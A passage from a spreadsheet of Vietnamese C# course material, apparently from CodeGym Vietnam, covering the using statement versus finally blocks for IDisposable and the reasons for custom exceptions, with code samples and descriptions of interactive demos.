Không linh hoạt cho các tác vụ khác: Không thể dùng để thực hiện các tác vụ dọn dẹp tổng quát (ví dụ: ghi log, cập nhật trạng thái ứng dụng) không liên quan đến việc gọi Dispose().
Khối finally
Ưu điểm:
Tổng quát và linh hoạt: Có thể thực thi bất kỳ đoạn mã nào bất kể có ngoại lệ hay không. Không giới hạn đối tượng phải là IDisposable.
Kiểm soát hoàn toàn: Bạn có toàn quyền kiểm soát logic dọn dẹp. Điều này hữu ích khi bạn cần thực hiện các thao tác phức tạp hơn ngoài việc chỉ gọi Dispose().
Kết hợp với try-catch: Là một phần không thể thiếu của cấu trúc xử lý ngoại lệ try-catch-finally, cho phép bạn xử lý lỗi và dọn dẹp tài nguyên trong cùng một khối.
Nhược điểm:
Dài dòng hơn: So với using statement, mã trong finally thường dài hơn và yêu cầu nhiều boilerplate hơn, đặc biệt khi xử lý IDisposable (cần kiểm tra null trước khi gọi Dispose()).
Dễ mắc lỗi: Có nguy cơ quên gọi Dispose() hoặc không xử lý đúng trường hợp đối tượng là null, dẫn đến lỗi hoặc rò rỉ tài nguyên.
Yêu cầu khai báo biến bên ngoài: Để truy cập đối tượng trong finally, bạn thường phải khai báo đối tượng đó bên ngoài khối try.
Khi nào nên sử dụng cái nào?
Sử dụng using statement (hoặc using declaration):
Đây là lựa chọn ưu tiên hàng đầu khi bạn làm việc với bất kỳ đối tượng nào triển khai IDisposable (ví dụ: StreamReader, FileStream, SqlConnection, HttpClient).
Khi mục tiêu chính là đảm bảo tài nguyên được giải phóng một cách sạch sẽ và tự động.
Sử dụng khối finally:
Khi bạn cần thực hiện các thao tác dọn dẹp không liên quan đến việc gọi Dispose() của một đối tượng IDisposable cụ thể (ví dụ: đóng một kết nối không phải IDisposable, ghi log hoàn thành tác vụ, reset một biến trạng thái toàn cục).
Khi bạn cần đảm bảo một đoạn mã chung luôn được thực thi, bất kể ngoại lệ hay không, và không nhất thiết phải là việc giải phóng tài nguyên.
Khi bạn cần gọi Dispose() trên một đối tượng mà nó được tạo ra bên ngoài phạm vi của một using statement (ví dụ, đối tượng được truyền vào phương thức và không thuộc quyền sở hữu của phương thức đó).
Trong nhiều trường hợp, bạn có thể thấy using statement được lồng trong khối try-catch hoặc thậm chí try-finally. Điều này cho phép bạn tận dụng sự gọn gàng của using cho việc giải phóng IDisposable và sự linh hoạt của finally cho các tác vụ dọn dẹp khác.
Ví dụ kết hợp:
public void XuLyDuLieuVaGhiLog(string filePath)
{
    DbConnection connection = null; // Giả sử DbConnection không dùng using
    try
    {
        using (StreamReader reader = new StreamReader(filePath)) // Đảm bảo reader.Dispose()
        {
            connection = new DbConnection("connection_string");
            connection.Open();
            string line = reader.ReadLine();
            Console.WriteLine($"Đọc dòng: {line}");
            // Thực hiện các thao tác với DB
            connection.Close();
        } // reader.Dispose() tự động được gọi
    }
    catch (FileNotFoundException)
    {
        Console.WriteLine("Lỗi: Không tìm thấy file.");
    }
    catch (Exception ex)
    {
        Console.WriteLine($"Lỗi không xác định: {ex.Message}");
    }
    finally
    {
        // Khối finally để đảm bảo đóng kết nối DB và ghi log
        if (connection != null &amp;&amp; connection.State == ConnectionState.Open)
        {
            connection.Close(); // Đóng kết nối DB nếu nó còn mở
        }
        Console.WriteLine("Hoàn tất xử lý dữ liệu. Ghi log vào hệ thống.");
        // Ghi log hoặc thực hiện các tác vụ dọn dẹp khác không phải Dispose()
    }
}
Trong ví dụ trên, using statement đảm bảo StreamReader được giải phóng gọn gàng, trong khi khối finally đảm nhận việc đóng DbConnection (nếu nó không phải IDisposable hoặc được xử lý thủ công) và thực hiện các tác vụ ghi log chung. Sự kết hợp này mang lại cả sự hiệu quả và linh hoạt trong quản lý tài nguyên và xử lý lỗi.</t>
        </is>
      </c>
      <c r="W23" s="22" t="inlineStr">
        <is>
          <t># using statement như một cách thay thế cho finally (cho IDisposable)
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích `IDisposable` và phương thức `Dispose()` dùng để làm gì.
- Viết câu lệnh `using` thay cho `try/finally` viết tay.
- Dùng khai báo `using var` (từ C# 8) để `Dispose` khi hết phạm vi.
- Biết `using` được trình biên dịch dịch thành `try/finally`.
- Quan sát `Dispose` được gọi trong ba tình huống bằng hoạt động mô phỏng.
## IDisposable và Dispose()
Những đối tượng giữ tài nguyên (tệp, kết nối, luồng dữ liệu) thường cài đặt giao diện **`IDisposable`**. Giao diện này có một phương thức `Dispose()`, dùng để giải phóng tài nguyên. `StreamReader` là một ví dụ.
Ở bài trước, ta gọi `Dispose()` trong `finally`:
```csharp
var r = new StreamReader("data.txt");
try
{
    Console.WriteLine(r.ReadLine());
}
finally
{
    r.Dispose();   // luôn chạy
}
```
Cách này đúng, nhưng dài và dễ quên viết `finally`.
## using statement
Câu lệnh **`using`** làm đúng việc đó một cách ngắn gọn. Khi chương trình rời khối `using`, C# tự gọi `Dispose()`:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        using (var r = new StreamReader("data.txt"))
        {
            Console.WriteLine(r.ReadLine());
        }   // r.Dispose() được gọi tự động ở đây
    }
}
```
Trình biên dịch dịch `using` thành `try/finally`, nên có lỗi giữa chừng thì `Dispose()` vẫn chạy.
### Khi có lỗi giữa chừng
Giả sử dòng thứ hai của `data.txt` là `"abc"`:
```csharp
try
{
    using (var r = new StreamReader("data.txt"))
    {
        int a = int.Parse(r.ReadLine());
        int b = int.Parse(r.ReadLine());   // ném FormatException
    }
}
catch (FormatException)
{
    Console.WriteLine("Lỗi");
}
```
Lỗi làm thoát khối `using`, C# gọi `Dispose()` **trước**, rồi lỗi mới đi ra `catch` bên ngoài. Tệp luôn được đóng.
### using var (C# 8)
Từ C# 8, bạn có thể viết `using var` không cần cặp ngoặc. Đối tượng được `Dispose` khi ra khỏi **phạm vi** chứa nó, thường là cuối phương thức:
```csharp
static void Doc()
{
    using var r = new StreamReader("data.txt");
    Console.WriteLine(r.ReadLine());
    Console.WriteLine("Đọc xong");
}   // r.Dispose() được gọi ở đây
```
Dạng này ngắn nhất và không cần thụt lề thêm.
## So sánh using và try/finally
| Tiêu chí | `using` | `try/finally` viết tay |
|---|---|---|
| Độ dài | Ngắn gọn | Dài hơn |
| Quên `Dispose` | Không thể quên | Có thể quên |
| Áp dụng cho | Đối tượng `IDisposable` | Mọi việc dọn dẹp |
| Dọn dẹp tùy ý (ghi log...) | Không | Có |
Dùng `using` cho đối tượng `IDisposable`. Dùng `finally` khi việc dọn dẹp không phải là `Dispose()`.
## Hoạt động: Cùng một việc, hai cách viết
Mô phỏng dưới đây có hai cột đều đọc `data.txt` (dòng đầu là 10). Cột trái là **try/finally viết tay**, cột phải là **using**. Đèn `StreamReader r` cho biết trạng thái tệp. Hãy bấm **Bước tiếp** để chạy từng dòng ở cả hai cột:
- Mở tab **Không lỗi**. Cả hai cột mở tệp (đèn "Đang mở") và in "10". Cột trái: `finally` gọi `r.Dispose()`. Cột phải: tới dấu `}` của khối `using`, C# tự gọi `Dispose`. Đèn chuyển xanh "Đã Dispose" ở cả hai, nhưng cột phải chỉ có 5 dòng.
- Mở tab **Có lỗi giữa chừng**. Dòng 2 là "abc" nên `Parse` ném `FormatException` (thẻ lỗi đỏ) khi tệp đang mở. Cột trái: `catch` in "Lỗi" trước, rồi `finally` mới `Dispose`. Cột phải: `using` `Dispose` trước khi lỗi đi ra, rồi `catch` ngoài in "Lỗi". Tệp đều được đóng, chỉ khác thứ tự.
- Mở tab **Khai báo using (C# 8)**. Hai cột là hai hàm `Doc()` đều in "10" rồi "Đọc xong". Ở cột phải, `using var` giữ tệp mở cho đến dấu `}` của hàm, lúc đó mới tự `Dispose`. Cột này chỉ có 8 dòng.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/khoi-finally-va-dam-bao-giai-phong-tai-nguyen/using-statement-nhu-mot-cach-thay-the-cho-finally-cho-idisposable/" title="using thay cho finally" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `using` cho kết quả giống hệt `try/finally` viết tay, kể cả khi có lỗi, nhưng ngắn hơn và không thể quên `Dispose`. Với đối tượng `IDisposable`, hãy ưu tiên `using`.
## Khi nào vẫn dùng finally?
`finally` vẫn cần khi việc dọn dẹp không phải `Dispose()`, ví dụ ghi log kết thúc, trả về trạng thái ban đầu của biến, hoặc đóng một đối tượng không hỗ trợ `IDisposable`. Bạn cũng có thể kết hợp cả hai: `using` để đóng tệp, `finally` để ghi log.
## Lỗi thường gặp
- **Dùng `using` cho kiểu không có `Dispose()`.** Trình biên dịch sẽ báo lỗi vì kiểu đó không cài `IDisposable`.
- **Dùng đối tượng sau khối `using`.** Sau khi `Dispose()` chạy, đối tượng không còn dùng được. Đọc tiếp từ `StreamReader` đã đóng sẽ ném `ObjectDisposedException`.
- **Quên rằng `using var` sống đến hết phạm vi.** Tài nguyên được giữ lâu hơn dự tính nếu hàm còn dài phía sau.
## Tóm tắt
- `IDisposable` có phương thức `Dispose()` để giải phóng tài nguyên.
- `using (...) { }` tự gọi `Dispose()` khi rời khối, kể cả khi có lỗi.
- `using var` (C# 8) `Dispose` khi hết phạm vi, thường là cuối phương thức.
- Trình biên dịch dịch `using` thành `try/finally`.
- Ưu tiên `using` cho đối tượng `IDisposable`. Dùng `finally` cho việc dọn dẹp khác.</t>
        </is>
      </c>
    </row>
    <row r="24" ht="409.6" customHeight="1" s="18">
      <c r="A24" s="10" t="n">
        <v>24</v>
      </c>
      <c r="B24" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C24" s="10" t="inlineStr">
        <is>
          <t>Tạo và Sử dụng Ngoại lệ Tùy chỉnh (Custom Exceptions)</t>
        </is>
      </c>
      <c r="D24" s="10" t="inlineStr">
        <is>
          <t>Tại sao cần ngoại lệ tùy chỉnh?</t>
        </is>
      </c>
      <c r="E24" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F24" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G24" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H24" s="10" t="inlineStr">
        <is>
          <t>So sánh bắt lỗi bằng cách dò chuỗi thông điệp với bắt theo một kiểu exception riêng.</t>
        </is>
      </c>
      <c r="I24" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Exception chung | InsufficientFundsException</t>
        </is>
      </c>
      <c r="J24" s="10" t="inlineStr">
        <is>
          <t>Thẻ exception hai bên: trái chỉ có Message; phải có thêm Balance và Amount. Một bước 'đổi câu chữ thông điệp' làm điều kiện bên trái sai (thẻ catch chuyển đỏ).</t>
        </is>
      </c>
      <c r="K24" s="10" t="inlineStr">
        <is>
          <t>H03</t>
        </is>
      </c>
      <c r="L24" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M24" s="10" t="inlineStr">
        <is>
          <t>Rút 500 khi số dư 200.
Trái: throw new Exception("Số dư không đủ"); catch kiểm tra ex.Message.Contains("không đủ").
Phải: throw new InsufficientFundsException(200, 500); catch (InsufficientFundsException ex).
Có người sửa thông điệp thành "Tài khoản thiếu tiền" → điều kiện Contains bên trái sai, lỗi bị xử lý nhầm nhánh.
Phải không bị ảnh hưởng, còn tính được ex.Amount − ex.Balance = 300 để báo thiếu bao nhiêu.
Xong.</t>
        </is>
      </c>
      <c r="N24" s="10" t="inlineStr">
        <is>
          <t>Số dư 200, rút 500</t>
        </is>
      </c>
      <c r="O24" s="10" t="inlineStr">
        <is>
          <t>Exception tùy chỉnh mang ý nghĩa nghiệp vụ và dữ liệu kèm theo, bắt theo kiểu thay vì dò chữ.</t>
        </is>
      </c>
      <c r="P24" s="10" t="n"/>
      <c r="Q24" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/tao-va-su-dung-ngoai-le-tuy-chinh-custom-exceptions/tai-sao-can-ngoai-le-tuy-chinh/index.html</t>
        </is>
      </c>
      <c r="R24" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/tao-va-su-dung-ngoai-le-tuy-chinh-custom-exceptions/tai-sao-can-ngoai-le-tuy-chinh/</t>
        </is>
      </c>
      <c r="S24" s="10" t="n"/>
      <c r="T24" s="12" t="n"/>
      <c r="U24" s="12" t="n"/>
      <c r="V24" s="21" t="inlineStr">
        <is>
          <t>Hạn chế của việc chỉ sử dụng các ngoại lệ có sẵn trong .NET Framework
Khi phát triển ứng dụng C#, .NET Framework cung cấp một tập hợp phong phú các lớp ngoại lệ dựng sẵn (built-in exceptions) như ArgumentNullException, FormatException, InvalidOperationException, FileNotFoundException, v.v. Chúng rất hữu ích và được thiết kế để xử lý các tình huống lỗi phổ biến ở cấp độ hệ thống hoặc khung làm việc.
Ví dụ:
ArgumentNullException được ném ra khi một đối số được truyền vào phương thức là null mà lẽ ra không được phép.
FormatException xảy ra khi một chuỗi không có định dạng chính xác để chuyển đổi sang một kiểu dữ liệu khác (ví dụ: cố gắng chuyển đổi "abc" thành số nguyên).
InvalidOperationException báo hiệu rằng một phương thức đã được gọi trên một đối tượng mà trạng thái hiện tại của nó không cho phép thao tác đó.
Tuy nhiên, khi ứng dụng của bạn phát triển phức tạp hơn với nhiều logic nghiệp vụ (business logic) đặc thù, việc chỉ dựa vào các ngoại lệ dựng sẵn này sẽ bộc lộ những hạn chế đáng kể:
Thiếu tính rõ ràng và ngữ cảnh nghiệp vụ: Các ngoại lệ dựng sẵn thường mang ý nghĩa chung chung. Ví dụ, trong một ứng dụng ngân hàng, nếu người dùng cố gắng rút tiền vượt quá số dư hiện có, việc ném một InvalidOperationException là hợp lệ về mặt kỹ thuật. Tuy nhiên, thông báo lỗi chỉ là "Thao tác không hợp lệ" hoặc "Invalid operation" không truyền tải được nguyên nhân cốt lõi của vấn đề: "Tài khoản không đủ số dư".
Khó phân biệt các loại lỗi nghiệp vụ khác nhau: Nhiều điều kiện lỗi nghiệp vụ khác nhau có thể bị gói gọn trong cùng một loại ngoại lệ chung. Ví dụ, cả "tên người dùng đã tồn tại" và "mật khẩu không đủ mạnh" đều có thể bị xử lý bằng ArgumentException hoặc InvalidOperationException kèm theo các thông báo khác nhau. Điều này khiến cho việc phân biệt và xử lý cụ thể từng loại lỗi trở nên khó khăn hơn.
Mã nguồn kém dễ đọc và khó bảo trì: Khi mã nguồn của bạn phải dựa vào việc phân tích chuỗi thông báo (error message string) để xác định loại lỗi nghiệp vụ cụ thể, nó trở nên cồng kềnh, dễ sai sót và khó bảo trì.
try
{
    // Giả sử một phương thức ném InvalidOperationException
    // với thông báo cụ thể cho lỗi nghiệp vụ
    userService.RegisterUser("john.doe", "password123");
}
catch (InvalidOperationException ex)
{
    if (ex.Message.Contains("Username already exists"))
    {
        Console.WriteLine("Tên người dùng đã tồn tại. Vui lòng chọn tên khác.");
    }
    else if (ex.Message.Contains("Password is too weak"))
    {
        Console.WriteLine("Mật khẩu không đủ mạnh. Vui lòng thêm ký tự đặc biệt.");
    }
    else
    {
        Console.WriteLine("Đã xảy ra lỗi nghiệp vụ không xác định: " + ex.Message);
    }
}
Mã trên minh họa rõ ràng sự bất tiện và dễ vỡ khi phải dựa vào chuỗi thông báo.
Khó gỡ lỗi (debug): Khi một ngoại lệ chung chung xảy ra, việc xác định nguyên nhân gốc rễ của một lỗi nghiệp vụ cụ thể có thể mất nhiều thời gian hơn vì thông tin trong ngoại lệ không đủ chi tiết.
Những hạn chế này cho thấy cần có một cách tiếp cận linh hoạt hơn để xử lý các điều kiện lỗi đặc thù của ứng dụng, và đó chính là lúc các ngoại lệ tùy chỉnh phát huy tác dụng.
Lợi ích của ngoại lệ tùy chỉnh
Ngoại lệ tùy chỉnh (Custom Exceptions) là các lớp ngoại lệ do bạn tự định nghĩa, thường kế thừa từ lớp Exception hoặc một trong các lớp ngoại lệ tiêu chuẩn khác của .NET. Việc tạo và sử dụng chúng mang lại nhiều lợi ích quan trọng:
Tăng tính rõ ràng và dễ đọc cho mã nguồn:
Một ngoại lệ tùy chỉnh có tên mô tả rõ ràng ngay lập tức cho biết loại lỗi nghiệp vụ đã xảy ra mà không cần đọc thông báo chi tiết.
Thay vì InvalidOperationException("Tài khoản không đủ số dư."), bạn có InsufficientFundsException.
Thay vì ArgumentException("Tên người dùng đã tồn tại."), bạn có DuplicateUsernameException.
Điều này giúp mã nguồn tự giải thích (self-documenting) và dễ hiểu hơn nhiều.
Dễ dàng phân biệt và xử lý lỗi cụ thể:
Với ngoại lệ tùy chỉnh, bạn có thể sử dụng các khối catch để bắt và xử lý từng loại lỗi nghiệp vụ một cách riêng biệt. Điều này cho phép bạn triển khai các logic xử lý, thông báo cho người dùng hoặc chiến lược phục hồi khác nhau tùy theo bản chất của lỗi.
try
{
    bankingService.Withdraw(accountId, amount);
}
catch (InsufficientFundsException ex)
{
    Console.WriteLine($"Lỗi: Tài khoản {ex.AccountId} không đủ số dư. Số dư hiện tại: {ex.CurrentBalance}. Số tiền cần rút: {ex.AttemptedAmount}");
    // Gửi thông báo thân thiện đến người dùng
}
catch (AccountLockedException ex)
{
    Console.WriteLine($"Lỗi: Tài khoản {ex.AccountId} đã bị khóa. Vui lòng liên hệ hỗ trợ.");
    // Gửi thông báo khác hoặc chuyển hướng
}
catch (Exception ex)
{
    // Xử lý các lỗi không xác định khác
    Console.WriteLine("Đã xảy ra lỗi hệ thống không mong muốn: " + ex.Message);
    // Log lỗi chi tiết
}
Trong ví dụ trên, các ngoại lệ InsufficientFundsException và AccountLockedException có thể chứa các thuộc tính bổ sung (như AccountId, CurrentBalance, AttemptedAmount) để cung cấp ngữ cảnh chi tiết hơn về lỗi.
Dễ gỡ lỗi (Debug) hơn:
Khi một ngoại lệ tùy chỉnh được ném ra và xuất hiện trong stack trace, tên của nó ngay lập tức chỉ ra nguyên nhân nghiệp vụ của vấn đề. Điều này giúp các nhà phát triển nhanh chóng khoanh vùng và khắc phục lỗi.
Tăng tính bảo trì và mở rộng:
Khi các quy tắc nghiệp vụ thay đổi hoặc có thêm các điều kiện lỗi mới, bạn có thể tạo các lớp ngoại lệ tùy chỉnh mới mà không cần sửa đổi hoặc can thiệp vào logic xử lý cho các lỗi đã có. Điều này giúp giữ cho mã nguồn sạch sẽ và dễ dàng mở rộng.
Tạo phân cấp lỗi có ý nghĩa:
Bạn có thể thiết kế một hệ thống phân cấp các ngoại lệ tùy chỉnh, ví dụ: tất cả các lỗi nghiệp vụ của ứng dụng có thể kế thừa từ một lớp cơ sở MyAppBusinessException. Điều này cho phép bạn bắt một loại lỗi rộng hơn (ví dụ: catch (MyAppBusinessException ex)) để xử lý chung các lỗi nghiệp vụ, trong khi vẫn có thể bắt các lỗi cụ thể hơn.
Khi nào nên tạo ngoại lệ tùy chỉnh
Việc tạo ngoại lệ tùy chỉnh là một công cụ mạnh mẽ, nhưng không phải mọi tình huống lỗi đều cần đến nó. Dưới đây là các hướng dẫn về thời điểm thích hợp để tạo ngoại lệ tùy chỉnh:
Khi lỗi đại diện cho một điều kiện nghiệp vụ cụ thể:
Nếu ứng dụng của bạn có các quy tắc nghiệp vụ mà việc vi phạm chúng cần được xử lý riêng biệt và có ý nghĩa đối với người dùng hoặc hệ thống, hãy tạo một ngoại lệ tùy chỉnh.
Ví dụ: "Sản phẩm không còn hàng", "Người dùng không có quyền truy cập", "Mã khuyến mãi không hợp lệ", "Đơn hàng đã được xử lý".
Khi bạn muốn cung cấp thêm thông tin ngữ cảnh về lỗi:
Các ngoại lệ tùy chỉnh có thể chứa các thuộc tính (properties) để lưu trữ dữ liệu cụ thể liên quan đến lỗi, giúp việc gỡ lỗi hoặc hiển thị thông báo chi tiết hơn.
ProductNotFoundException có thể chứa ProductId.
InvalidLoginAttemptException có thể chứa Username và AttemptsRemaining.
Khi bạn muốn phân biệt rõ ràng giữa lỗi hệ thống và lỗi nghiệp vụ:
Lỗi hệ thống (ví dụ: OutOfMemoryException, NullReferenceException) thường là không thể phục hồi và chỉ ra một vấn đề nghiêm trọng với ứng dụng hoặc môi trường. Lỗi nghiệp vụ là các điều kiện dự kiến có thể xảy ra do tương tác của người dùng hoặc dữ liệu đầu vào. Ngoại lệ tùy chỉnh giúp phân biệt hai loại này, cho phép bạn xử lý lỗi nghiệp vụ một cách duyên dáng hơn.
Khi bạn muốn tạo một hệ thống phân cấp lỗi cho ứng dụng:
Nếu bạn dự định có nhiều loại lỗi nghiệp vụ trong một miền cụ thể của ứng dụng, việc tạo một lớp ngoại lệ cơ sở tùy chỉnh (ví dụ: MyApplication.DataAccessException mà từ đó MyApplication.RecordNotFoundException và MyApplication.DuplicateRecordException kế thừa) có thể rất hữu ích cho việc tổ chức và xử lý lỗi.
Quy tắc ngón tay cái (Rule of Thumb):
Nếu bạn thấy mình đang ném một ngoại lệ .NET Framework chung chung (như InvalidOperationException hoặc ArgumentException) và phải viết một thông báo lỗi dài để giải thích chi tiết tại sao thao tác không hợp lệ hoặc đối số không hợp lệ, thì đó là một dấu hiệu mạnh mẽ cho thấy bạn cần một ngoại lệ tùy chỉnh. Ngoại lệ tùy chỉnh giúp bạn nói "Đây là loại lỗi này" thay vì "Đây là một lỗi chung chung, nhưng cụ thể thì nó là loại này".
Khi nào KHÔNG nên tạo ngoại lệ tùy chỉnh:
Khi một ngoại lệ .NET Framework hiện có đã đủ rõ ràng: Ví dụ, nếu bạn đang cố gắng truy cập một tệp không tồn tại, FileNotFoundException là hoàn toàn thích hợp.
Khi lỗi có thể được xử lý bằng logic kiểm tra điều kiện đơn giản: Không nên sử dụng ngoại lệ cho luồng điều khiển bình thường. Ví dụ, thay vì ném ngoại lệ khi một giá trị đầu vào nhỏ hơn 0, bạn nên kiểm tra if (value &lt; 0) và xử lý nó bằng cách trả về false hoặc một giá trị mặc định nếu phù hợp.
Tóm lại, ngoại lệ tùy chỉnh là một công cụ mạnh mẽ để làm cho mã nguồn của bạn rõ ràng hơn, dễ bảo trì hơn và cung cấp trải nghiệm xử lý lỗi tốt hơn cho cả nhà phát triển và người dùng cuối.</t>
        </is>
      </c>
      <c r="W24" s="22" t="inlineStr">
        <is>
          <t># Tại sao cần ngoại lệ tùy chỉnh?
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Nêu hạn chế của việc chỉ dùng `Exception` chung hoặc exception có sẵn cho lỗi nghiệp vụ.
- Giải thích vì sao bắt lỗi bằng cách dò chữ trong `Message` dễ hỏng.
- Kể ra các lợi ích của ngoại lệ tùy chỉnh (custom exception): rõ nghĩa, bắt theo kiểu, mang dữ liệu kèm theo.
- Biết khi nào nên và không nên tạo ngoại lệ tùy chỉnh.
- So sánh hai cách bắt lỗi "rút quá số dư" bằng hoạt động mô phỏng.
## Hạn chế của exception có sẵn
.NET có nhiều exception sẵn như `FormatException`, `InvalidOperationException`, `ArgumentException`. Chúng rất hữu ích cho lỗi kỹ thuật chung. Nhưng với lỗi **nghiệp vụ** của riêng ứng dụng, ví dụ "rút tiền quá số dư", các exception này không đủ rõ nghĩa.
Cách đơn giản nhất là ném `Exception` chung với một thông điệp:
```csharp
static void Rut(decimal b, decimal a)
{
    if (a &gt; b)
    {
        throw new Exception("Số dư không đủ");
    }
}
```
Nơi bắt lỗi phải nhận ra "đây có phải lỗi thiếu tiền không" bằng cách **dò chữ** trong `Message`:
```csharp
try
{
    Rut(200, 500);
}
catch (Exception ex)
{
    if (ex.Message.Contains("không đủ"))
    {
        Console.WriteLine("Thiếu tiền");
    }
    else
    {
        Console.WriteLine("Lỗi khác");
    }
}
```
Cách này chạy đúng, nhưng rất dễ vỡ:
- Ai đó đổi thông điệp thành "Tài khoản thiếu tiền" thì `Contains("không đủ")` thành `false`.
- Chương trình vẫn biên dịch bình thường, không có cảnh báo nào.
- Lỗi thiếu tiền lọt vào nhánh "Lỗi khác" và bị xử lý nhầm.
- `Exception` chung chỉ mang một chuỗi, không có số dư hay số tiền rút để dùng.
## Ngoại lệ tùy chỉnh giải quyết thế nào?
**Ngoại lệ tùy chỉnh** là lớp do ta tự tạo, kế thừa từ `Exception`, cho một loại lỗi nghiệp vụ cụ thể. Lớp `InsufficientFundsException` sẽ được tạo ở bài sau. Ở đây hãy xem nó được dùng ra sao:
```csharp
static void Rut(decimal b, decimal a)
{
    if (a &gt; b)
    {
        throw new InsufficientFundsException(b, a);   // mang theo Balance và Amount
    }
}
try
{
    Rut(200, 500);
}
catch (InsufficientFundsException ex)
{
    decimal thieu = ex.Amount - ex.Balance;
    Console.WriteLine("Thiếu " + thieu);   // Thiếu 300
}
```
`catch` khớp theo **kiểu**, không cần đọc chữ. Đổi thông điệp thì `catch` vẫn đúng. Lại có sẵn `Balance` và `Amount` để tính ra thiếu bao nhiêu.
## Hoạt động: Dò chữ và bắt theo kiểu
Mô phỏng dưới đây cho cả hai cột cùng rút 500 từ tài khoản có 200. Cột trái là **Exception chung**, cột phải là **InsufficientFundsException**. Hãy bấm **Bước tiếp** để chạy từng dòng ở cả hai cột:
- Mở tab **Rút 500, số dư 200**. Ở cả hai cột, `Rut(200, 500)` thấy điều kiện `a &gt; b` đúng và ném exception.
- **Cột trái (Exception chung):** exception chỉ mang `Message` là "Số dư không đủ". `catch` dò `Contains("không đủ")` ra `true`, in "Thiếu tiền". Rồi có người sửa thông điệp thành "Tài khoản thiếu tiền". Điều kiện thành `false`, chương trình rơi vào nhánh "Lỗi khác" (thẻ đỏ) và xử lý nhầm.
- **Cột phải (InsufficientFundsException):** exception mang `Balance = 200` và `Amount = 500`. `catch` khớp theo kiểu, tính `Amount - Balance = 300` và in "Thiếu 300". Sau khi thông điệp bị sửa, chạy lại vẫn bắt đúng và vẫn in "Thiếu 300".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/tao-va-su-dung-ngoai-le-tuy-chinh-custom-exceptions/tai-sao-can-ngoai-le-tuy-chinh/" title="Tại sao cần ngoại lệ tùy chỉnh" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: ngoại lệ tùy chỉnh mang ý nghĩa nghiệp vụ và dữ liệu kèm theo. Hãy bắt lỗi theo kiểu thay vì dò chữ trong thông điệp.
## Lợi ích của ngoại lệ tùy chỉnh
- **Rõ ràng:** tên `InsufficientFundsException` nói ngay chuyện gì đã xảy ra.
- **Dễ phân biệt lỗi:** mỗi loại lỗi nghiệp vụ có `catch` riêng, tách khỏi lỗi hệ thống.
- **Mang dữ liệu:** thêm thuộc tính như `Balance`, `Amount` để phần xử lý lỗi dùng.
- **Dễ gỡ lỗi:** nhìn tên exception trong log là biết lỗi gì.
- **Có thể tạo phân cấp:** một lớp gốc cho lỗi của ứng dụng, các lớp con cho từng loại lỗi.
## Khi nào nên và không nên tạo?
Nên tạo khi:
- Lỗi là một điều kiện **nghiệp vụ** cụ thể (hết hàng, số dư không đủ, tài khoản bị khóa).
- Phần bắt lỗi cần **dữ liệu kèm theo** hoặc cần xử lý riêng.
- Bạn muốn phân biệt lỗi nghiệp vụ với lỗi hệ thống.
Không cần tạo khi:
- Exception có sẵn đã diễn tả đúng, ví dụ `ArgumentNullException` cho tham số `null`.
- Không ai bắt riêng loại lỗi đó và không có dữ liệu thêm cần mang.
## Ví dụ phân cấp lỗi
Khi ứng dụng có nhiều lỗi nghiệp vụ, ta có thể tạo một lớp gốc rồi cho các lỗi cụ thể kế thừa từ nó. Nhờ vậy có thể bắt riêng từng lỗi, hoặc bắt chung mọi lỗi của ứng dụng bằng lớp gốc:
```csharp
public class AppException : Exception { }
public class InsufficientFundsException : AppException { }
public class AccountLockedException : AppException { }
```
Quy tắc về thứ tự `catch` ở bài trước vẫn áp dụng: `catch` cụ thể đặt trước, `catch (AppException)` đặt sau.
## Tóm tắt
- `Exception` chung chỉ có thông điệp, buộc nơi bắt phải dò chữ.
- Dò chữ rất dễ vỡ: đổi thông điệp là xử lý nhầm mà không có cảnh báo nào.
- Ngoại lệ tùy chỉnh cho phép bắt lỗi theo kiểu, ổn định hơn.
- Nó mang thêm dữ liệu nghiệp vụ như `Balance` và `Amount`.
- Chỉ tạo khi lỗi nghiệp vụ cụ thể và cần xử lý riêng.</t>
        </is>
      </c>
    </row>
    <row r="25" ht="409.6" customHeight="1" s="18">
      <c r="A25" s="10" t="n">
        <v>25</v>
      </c>
      <c r="B25" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C25" s="10" t="inlineStr">
        <is>
          <t>Tạo và Sử dụng Ngoại lệ Tùy chỉnh (Custom Exceptions)</t>
        </is>
      </c>
      <c r="D25" s="10" t="inlineStr">
        <is>
          <t>Hướng dẫn tạo CustomException</t>
        </is>
      </c>
      <c r="E25" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F25" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G25" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H25" s="10" t="inlineStr">
        <is>
          <t>Thấy cấu trúc tối thiểu của một exception tự tạo và đường đi throw → catch của nó.</t>
        </is>
      </c>
      <c r="I25" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J25" s="10" t="inlineStr">
        <is>
